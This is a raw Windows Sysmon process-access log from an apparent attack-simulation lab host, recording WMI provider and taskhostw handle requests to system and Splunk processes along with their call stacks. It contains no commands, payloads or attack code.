15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022564Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022563Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022562Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022561Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022560Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022559Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022558Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022557Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022556Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022555Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022554Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022553Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022552Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022551Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022550Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022549Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022548Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022547Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022546Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022545Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022544Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program 